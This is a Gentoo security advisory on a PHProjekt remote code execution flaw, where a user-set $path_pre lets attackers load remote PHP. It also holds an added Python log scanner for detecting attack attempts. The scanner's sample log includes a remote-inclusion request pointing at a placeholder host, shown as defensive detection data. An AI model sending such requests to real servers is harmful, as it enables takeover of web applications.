PHProjekt: Remote code execution vulnerability

2004-12-30T00:00:00
ID GLSA-200412-27
Type gentoo
Reporter Gentoo Foundation
Modified 2004-12-30T00:00:00

Description

Background

PHProjekt is a modular groupware web application used to coordinate group activities and share files.

Description

cYon discovered that the authform.inc.php script allows a remote user to define the global variable $path_pre.

Impact

A remote attacker can exploit this vulnerability to force authform.inc.php to download and execute arbitrary PHP code with the privileges of the web server user.
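To review web server access logs for requests that try to set this variable, the following added example (not part of the original advisory and not Gentoo or PHProjekt code) flags requests to authform.inc.php that carry a path_pre parameter. It assumes Combined Log Format logs and that the variable arrives as a request parameter of the same name; the function name, the /APP_PATH/ placeholder and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumptions, not from the advisory: Combined Log Format access logs, and the
# variable arriving as a request parameter named after it (path_pre).
SCRIPT, PARAM = "authform.inc.php", "path_pre"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

def find_path_pre_requests(lines):
    """Return one record per request to authform.inc.php that sets path_pre."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skipped, not treated as clean
        target = urlsplit(m["target"])
        if not target.path.lower().endswith("/" + SCRIPT):
            continue
        # parse_qsl percent-decodes names and values, so path%5Fpre is caught
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name.split("[", 1)[0] == PARAM:  # also matches path_pre[]=...
                hits.append({
                    "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                    "value": value,
                    "remote": "://" in value,  # value names another host
                })
    return hits

# Constructed sample log lines (documentation addresses, placeholder paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Dec/2004:10:00:01 +0000] "GET /APP_PATH/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [30/Dec/2004:10:02:13 +0000] "GET /APP_PATH/authform.inc.php?path_pre=http://files.example.invalid/ HTTP/1.0" 200 312 "-" "-"',
    '198.51.100.8 - - [30/Dec/2004:10:02:40 +0000] "GET /APP_PATH/authform.inc.php?path%5Fpre=test HTTP/1.0" 200 298 "-" "-"',
    '192.0.2.11 - - [30/Dec/2004:10:03:05 +0000] "GET /APP_PATH/authform.inc.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [30/Dec/2004:10:04:00 +0000] "GET /APP_PATH/other.php?path_pre=x HTTP/1.1" 404 210 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_path_pre_requests(SAMPLE_LOG):
        print(hit)
```

Access logs in this format record only the request line, so a value sent in a request body would not appear here.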

Workaround

There is no known workaround at this time.

Resolution

All PHProjekt users should upgrade to the latest version:

 # emerge --sync
 # emerge --ask --oneshot --verbose ">=www-apps/phprojekt-4.2-r2"